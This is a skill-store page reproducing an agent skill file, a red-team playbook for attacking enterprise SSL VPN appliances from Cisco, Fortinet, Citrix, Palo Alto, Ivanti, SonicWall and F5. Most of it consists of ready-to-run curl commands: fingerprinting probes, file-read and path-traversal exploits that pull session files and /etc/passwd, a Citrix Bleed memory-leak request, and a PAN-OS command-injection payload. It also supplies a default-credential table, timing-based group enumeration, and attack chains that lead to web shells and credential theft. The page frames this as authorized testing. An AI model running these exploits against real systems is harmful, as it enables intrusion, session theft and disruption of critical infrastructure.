‹ 首页

enterprise-vpn-attack

@elementalsouls · 收录于 1 周前 · 上游提交 2 周前

External SSL VPN / remote-access appliance attack matrix — Cisco ASA/AnyConnect, Fortinet FortiGate/FortiOS, Citrix NetScaler/ADC, Palo Alto GlobalProtect, Pulse Secure / Ivanti Connect Secure, SonicWall, F5 Big-IP. Covers version fingerprinting, CVE matrix (2018-2026), AAA backend identification, default credentials, configuration-disclosure paths, pre-auth RCE/SSRF/path-traversal exploits where applicable. Built from authorized-engagement Cisco ASA testing plus 2024-2026 enterprise VPN CVE landscape. Use whenever the target's perimeter exposes any SSL VPN appliance or remote-access gateway — these are the most common initial-access points in 2024-2026 actor TTPs.

适合你,如果需要对SSL VPN设备进行授权安全评估

/ 下载安装
enterprise-vpn-attack.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add elementalsouls/claude-bughunter/enterprise-vpn-attack
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- elementalsouls/claude-bughunter/enterprise-vpn-attack
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify elementalsouls/claude-bughunter/enterprise-vpn-attack
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2927GitHub stars
~3.7K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 05098fc · 表述以原文为准
它做什么

装上后,Claude 能识别并测试企业 SSL VPN 设备(如 Cisco、Fortinet、Citrix 等)的已知漏洞,包括版本探测、默认密码尝试、文件读取和远程代码执行等。

什么时候触发

当目标网络边界暴露了 SSL VPN 登录页面(如 /+CSCOE+/logon.html 或 /remote/login)时触发。

装好后可以这样说
Claude 会执行指纹识别和 CVE 探测。
Claude 会发送特定请求测试。
Claude 会尝试登录,注意锁定风险。
技能原文 SKILL.md作者撰写 · MIT · 05098fc
When to use this skill

Trigger when recon surfaces:

  • *.<client>.example/+CSCOE+/logon.html or similar +CSCOE+ paths → Cisco ASA / AnyConnect
  • intranet.* / vpn.* / connect.* / webvpn.* / wc.* / remote.* subdomains
  • Port 443 returning login pages with Server: Apache or banner like "AnyConnect", "FortiGate", "NetScaler", "GlobalProtect", "Pulse", "Ivanti"
  • TCP 8443 / 4443 / 10443 / 8888 (common VPN web-mgmt ports)
  • HTTP responses with Set-Cookie: webvpn= (Cisco) / SVPNCOOKIE= (Fortinet) / NSC_AAA= (Citrix) / DSAuthSession= (Pulse) / BIGipServer* (F5)

DO NOT use for:

  • Internal lateral-movement post-foothold (out of scope per user's boundary)
  • VPN client-side bugs (different attack class)
  • IPsec / L2TP / OpenVPN (different protocols, not SSL VPN web stack)

Vendor identification (fingerprinting)
Cisco ASA / AnyConnect
curl -skI 'https://target/+CSCOE+/logon.html' | head -10
# Look for: Set-Cookie: webvpn=; X-Frame-Options: SAMEORIGIN; CSP: ... block-all-mixed-content
# Login page contains: "AnyConnect", "CSCOE", "logon.html"

ASA version: not banner-disclosed in modern builds; need to derive from JS file paths or test specific paths.

# Path-based version hints (older builds leaked builds in URLs)
curl -sk 'https://target/+CSCOE+/sdesktop/scan-finalize?path=test'
curl -sk 'https://target/+CSCOE+/saml/sp/metadata'         # 200 = SAML auth enabled
curl -sk 'https://target/CSCOSSLC/config-auth'             # AnyConnect handshake endpoint
Fortinet FortiGate / FortiOS
curl -skI 'https://target/remote/login' | head -10
# Look for: Set-Cookie: SVPNCOOKIE=, Server header missing or "xxxxxxxx-xxxxx"
# Login page contains: "FortiGate", "Fortinet", "SSL-VPN"

Version: /remote/info sometimes leaks (older), or /login?username= 302 response

Citrix NetScaler / ADC / Gateway
curl -skI 'https://target/' | head -10
# Look for: Set-Cookie: NSC_AAA=, Set-Cookie: NSC_USER=, Server: NetScaler
# Login page contains: "NetScaler", "Citrix Gateway"

# Version banner
curl -sk 'https://target/vpn/index.html' | grep -oE 'NetScaler/[0-9.]+|NS[0-9.]+'
curl -sk 'https://target/menu/neo'                # 200 if vulnerable to CVE-2019-19781 era
Palo Alto GlobalProtect
curl -skI 'https://target/global-protect/login.esp' | head -10
# Look for: Set-Cookie: PHPSESSID= (yes, GP uses PHP), Server: Apache (PA-VM internal)
# Page contains: "GlobalProtect Portal", "PAN-OS"

# Version banner via login page
curl -sk 'https://target/global-protect/login.esp' | grep -oE 'GlobalProtect Portal[\s\S]{0,200}'
# Or check meta tag
curl -sk 'https://target/global-protect/login.esp' | grep -oE 'panui-[0-9.]+'
Pulse Secure / Ivanti Connect Secure
curl -skI 'https://target/dana-na/auth/url_default/welcome.cgi' | head -10
# Look for: Set-Cookie: DSAuthSession=, DSPREAUTH=
# Page contains: "Pulse Secure" or "Ivanti Connect Secure"

# Version
curl -sk 'https://target/dana-na/auth/url_default/welcome.cgi' | grep -oE 'Pulse Connect Secure[^<]*|ivanti[^<]*[0-9.]+'
SonicWall NetExtender / SMA
curl -skI 'https://target/cgi-bin/welcome' | head -10
# Look for: Set-Cookie: swap=, swapauth=
# Page contains: "SonicWall", "NetExtender", "SMA"
F5 Big-IP / APM
curl -skI 'https://target/my.policy' | head -10
# Look for: Set-Cookie: BIGipServer*, MRHSession=
# Server: BIG-IP (sometimes)

CVE matrix — pre-auth or auth-bypass (2018-2026)
Cisco ASA / AnyConnect

| CVE | Affects | Type | Test | |---|---|---|---| | CVE-2018-0296 | ASA pre-9.x specific builds | Path traversal — info disclosure (sessions, config) | GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua | | CVE-2020-3452 | ASA, FTD before specific patch levels | Path traversal — file read | GET /+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest+/+CSCOT+/lua/test.lua and variations | | CVE-2023-20269 | ASA, FTD specific | Auth bypass on SSL VPN | Brute-force a group + valid creds combo against /+webvpn+/index.html | | CVE-2024-20481 | RAVPN | DoS via crafted handshake | SKIP in red team — disruptive |

# Cisco CVE-2020-3452 — file read
curl -sk 'https://target/+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest+/+CSCOT+/lua/test.lua' | head -5

# Cisco CVE-2018-0296 — path traversal
curl -sk 'https://target/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua' | head -20

# Files commonly retrievable on vulnerable ASA:
# /+CSCOE+/portal_inc.lua    (portal inclusions — may reveal local users)
# /+CSCOE+/session_password.html
# /+CSCOE+/files/files.html
Fortinet FortiGate / FortiOS

| CVE | Affects | Type | Test | |---|---|---|---| | CVE-2018-13379 | FortiOS 5.4-6.0 | Path traversal — sslvpn_websession file read | GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession | | CVE-2022-42475 | FortiOS 7.x specific | Heap overflow — pre-auth RCE | Complex exploit; test with nuclei template CVE-2022-42475 | | CVE-2023-27997 (XORtigate) | FortiOS various | Heap overflow — pre-auth RCE | Public PoCs exist; nuclei template available | | CVE-2024-21762 | FortiOS 6.x-7.x | OOB write — pre-auth RCE | Public PoC; nuclei template CVE-2024-21762 | | CVE-2024-55591 | FortiOS 7.0-7.4 | Auth bypass on FortiOS Node.js websocket admin interface | GET /endpoint on admin-interface port |

# Fortinet CVE-2018-13379 — most reliably-fingerprintable file read
curl -sk --path-as-is 'https://target/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'
# Response contains plaintext usernames + sessions if vulnerable

# Fortinet credential dump format (from CVE-2018-13379 dumps that hit pastebin in 2021):
# IP:PORT     username     password     (and others)
Citrix NetScaler / ADC / Gateway

| CVE | Affects | Type | Test | |---|---|---|---| | CVE-2019-19781 (Shitrix) | ADC/Gateway 10.5-13.0 specific | Path traversal → RCE via XML upload | GET /vpn/../vpns/cfg/smb.conf | | CVE-2022-27518 | ADC/Gateway with SAML configured | Pre-auth RCE | Complex; test with nuclei | | CVE-2023-3519 | NetScaler ADC/Gateway 13.0-13.1 specific | Pre-auth RCE via crafted HTTP | Public PoCs exist | | CVE-2023-4966 (Citrix Bleed) | NetScaler ADC/Gateway 13.0-14.1 | Memory disclosure → session token theft | POST /oauth/idp/.well-known/openid-configuration with crafted Host header — long Host header triggers memory leak in response |

# Citrix Bleed (CVE-2023-4966) detection
HOST=$(python3 -c "print('A' * 24812)")
curl -sk -X POST -H "Host: $HOST" "https://target/oauth/idp/.well-known/openid-configuration" -o response.txt
# If response is large (>10KB) and contains random memory contents — vulnerable
# Session tokens often present in the memory dump

# CVE-2019-19781 file read
curl -sk --path-as-is 'https://target/vpn/../vpns/cfg/smb.conf'
Palo Alto GlobalProtect

| CVE | Affects | Type | Test | |---|---|---|---| | CVE-2024-3400 | PAN-OS 10.2-11.1 with GP enabled | Command injection — pre-auth RCE | POST /ssl-vpn/login.esp with crafted Cookie header containing SESSID=../../../var/log/pan/test.txt |

# CVE-2024-3400 detection
curl -sk -X POST 'https://target/ssl-vpn/login.esp' \
  -H 'Cookie: SESSID=../../../var/log/pan/test_$(id)_test.txt' \
  --data 'jsessionid=test'
# Look for file-creation side-effect on test path — palo creates file with command output
Pulse Secure / Ivanti Connect Secure / Policy Secure

| CVE | Affects | Type | Test | |---|---|---|---| | CVE-2019-11510 | Pulse Connect Secure 8.x-9.x | Arbitrary file read | GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/ | | CVE-2021-22893 | Pulse Connect Secure 9.x | Pre-auth RCE | Complex multi-step; test with nuclei | | CVE-2024-21887 | Ivanti Connect Secure 9.1-22.6 | Command injection on web component | POST /api/v1/totp/user-backup-code/ with crafted body | | CVE-2023-46805 | Ivanti Connect Secure 9.1-22.6 | Auth bypass | Combined with 21887 for full chain |

# CVE-2019-11510 — Pulse file read
curl -sk --path-as-is 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/'
SonicWall

| CVE | Affects | Type | Test | |---|---|---|---| | CVE-2021-20016 | SMA 100 series specific firmware | SQL injection — pre-auth | nuclei template available | | CVE-2024-40766 | SonicOS specific | Access-control flaw | Specific firmware versions |


SAML SP / IdP misconfigurations (always check)

Most enterprise VPNs now use SAML for SSO. Check SP metadata:

# Cisco ASA
curl -sk 'https://target/+CSCOE+/saml/sp/metadata' | head -50

# Fortinet
curl -sk 'https://target/remote/saml/metadata' | head -50

# Citrix
curl -sk 'https://target/saml/login' | head -30

Look for:

  • AuthnRequestsSigned="false" → see hunt-saml for XSW exploitation
  • WantAssertionsSigned="false" → severe; assertion-replay possible
  • Audience-restriction validation gaps
  • Public SP signing cert (for replay/forging attacks)

Default credentials (test sparingly — lockout risk)

| Vendor | User | Password | Notes | |---|---|---|---| | Cisco ASA | admin | cisco | Default factory; rarely seen in prod | | Cisco ASA | enable_15 | cisco | Console | | Fortinet | admin | (empty) | Factory default | | Citrix NetScaler | nsroot | nsroot | Factory default | | Citrix NetScaler | nsroot | (serial number) | Newer firmware | | Palo Alto | admin | admin | Factory default | | Pulse Secure | admin | password | Factory; CIS-hardened changes this | | F5 Big-IP | root | default | Factory | | F5 Big-IP | admin | admin | Common alternate | | SonicWall | admin | password | Factory |

⚠ Most enterprise targets have changed these. Test ≤2 attempts per account to avoid lockout.


Group / tunnel-group enumeration (Cisco-specific)

Cisco ASA AAA groups can sometimes be enumerated without auth.

# Tunnel group enumeration via timing
for group in DefaultRAGroup DefaultWEBVPNGroup SSLVPN Employees Contractors Vendors Partners Sales Marketing IT; do
  ms=$(curl -sk --max-time 10 -o /dev/null -w "%{time_total}" \
    -X POST "https://target/+webvpn+/index.html" \
    -d "username=test&password=test&group_list=$group&tgroup=&Login=Login")
  echo "$group: ${ms}s"
done
# Larger differential timing = group exists; valid groups respond slower in some builds

AAA backend identification

After auth fails, look at error response details:

| Pattern in response | AAA backend | |---|---| | a0=2 (Cisco) | Unknown user | | a0=3 (Cisco) | Wrong password | | a0=4 (Cisco) | Login restricted | | a0=12 (Cisco) | Account locked | | a0=115 (Cisco) | Generic auth fail (LDAP/RADIUS/AD layer error) | | AADSTS in response body | Backed by Entra (SAML) | | Authentication failed via RADIUS | RADIUS backend | | Invalid username or password (generic) | LDAP or local DB |

If you see SAML/Entra in the flow, pivot to m365-entra-attack skill for cred-spray strategy.


Common probe sequence (5-minute fingerprint)
TARGET="vpn.target.com"

# Cisco
curl -skI "https://$TARGET/+CSCOE+/logon.html" 2>&1 | head -3
curl -sk "https://$TARGET/+CSCOE+/saml/sp/metadata" -o /tmp/cisco_saml.xml; ls -la /tmp/cisco_saml.xml
curl -sk --path-as-is "https://$TARGET/+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest" -o /tmp/cisco_cve.html

# Fortinet
curl -skI "https://$TARGET/remote/login" 2>&1 | head -3
curl -sk --path-as-is "https://$TARGET/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -o /tmp/forti_cve.txt; head -c 200 /tmp/forti_cve.txt

# Citrix
curl -skI "https://$TARGET/" 2>&1 | head -3
curl -sk --path-as-is "https://$TARGET/vpn/../vpns/cfg/smb.conf" -o /tmp/citrix_cve.txt; head -c 200 /tmp/citrix_cve.txt
HOST=$(python3 -c "print('A' * 24812)")
curl -sk -X POST -H "Host: $HOST" "https://$TARGET/oauth/idp/.well-known/openid-configuration" -o /tmp/citrix_bleed.txt
wc -c /tmp/citrix_bleed.txt

# Palo Alto
curl -skI "https://$TARGET/global-protect/login.esp" 2>&1 | head -3

# Pulse / Ivanti
curl -skI "https://$TARGET/dana-na/auth/url_default/welcome.cgi" 2>&1 | head -3
curl -sk --path-as-is "https://$TARGET/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" -o /tmp/pulse_cve.txt; head -c 200 /tmp/pulse_cve.txt

Nuclei templates for fast triage

Nuclei has high-quality templates for most of the above CVEs. Single command sweeps:

nuclei -u https://target/ \
  -tags vpn,cisco-asa,fortinet,citrix,palo-alto,pulse-secure,sonicwall,f5 \
  -severity high,critical -rl 5

Add -as (auto-scan) for broader vuln coverage but slower.


Operational discipline
  • Banner-stripped servers (no version disclosure) are good defense-in-depth — record as positive finding even if no CVE found
  • Rate-limit yourself — these appliances often log every request to a SIEM. Patient pace, jittered timing.
  • SAML metadata is anonymous — pull it. It's intel about AAA backend.
  • Don't run pre-auth-RCE PoCs in red team without explicit OK — accidentally bricking a VPN concentrator = catastrophic for the client. Detection-only tests first, then escalate with permission.
  • Document the AAA backend identification — knowing whether ASA uses RADIUS-to-local vs SAML-to-Entra changes downstream attack paths.

Bridge to neighboring skills
  • m365-entra-attack — when AAA backend is Entra SAML; cred-spray strategy carries over
  • hunt-saml — XSW / signature-stripping if SAML SP is misconfigured
  • mid-engagement-ir-detection — appliances generate noisy logs; watch for IPS rules being deployed mid-engagement
  • redteam-mindset — banner-stripped ≠ "not vulnerable"; keep digging via behavioral fingerprints

Anti-patterns
  • Don't conclude "patched" from a 404 on one CVE path — patches deploy unevenly; test 3+ CVEs per vendor
  • Don't trust the version banner alone — appliance vendors often backport fixes without bumping the version string
  • Don't run heavy nuclei scans without rate-limiting — these appliances are critical infrastructure
  • Don't fingerprint by trying all CVE PoCs immediately — start with non-disruptive HEAD + version-banner probes
  • Don't skip SAML metadata — even when the appliance is patched, SAML SP misconfig is its own attack surface

Related Skills & Chains
  • hunt-rce — Every major VPN appliance (Pulse Secure, Fortinet, Citrix, Ivanti, Palo Alto) has shipped pre-auth path-traversal-to-RCE in the last 24 months. Chain primitive: VPN appliance CVE (e.g., Ivanti ICS CVE-2024-21887, Citrix Bleed CVE-2023-4966, Fortinet CVE-2024-21762) → hunt-rce pre-auth path traversal → arbitrary file write into web-root → request the file → web-shell as root → VPN config + LDAP bind credentials extracted.
  • hunt-saml — VPN SAML SP misconfig persists even on fully-patched appliances. Chain primitive: appliance patched against latest CVE but /saml/metadata reachable → IdP fingerprinted → hunt-saml XSW or comment-injection against IdP → forged assertion → VPN session established without password/MFA.
  • vmware-vcenter-attack — Post-VPN-foothold the natural next pivot is vCenter. Chain primitive: VPN web-shell → cred extraction from VPN appliance config (LDAP bind, RADIUS shared secret) → reuse against internal vCenter → if scope permits, vmware-vcenter-attack → datacenter takeover.
  • hunt-ntlm-info — Some VPN appliances expose anonymous NTLM on management paths. Chain primitive: VPN admin portal NTLM Type-2 capture → hunt-ntlm-info AV_PAIR decode → internal AD forest name → m365-entra-attack Entra spray on synced tenant.
  • mid-engagement-ir-detection + redteam-report-template — VPN appliance CVE exploitation is high-noise; SOC patches fast. Chain primitive: confirmed CVE → baseline capture via mid-engagement-ir-detection → if appliance updates mid-test, capture the patched-state as a SECOND finding → run both findings through triage-validation → package via redteam-report-template with explicit critical-infrastructure framing.
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。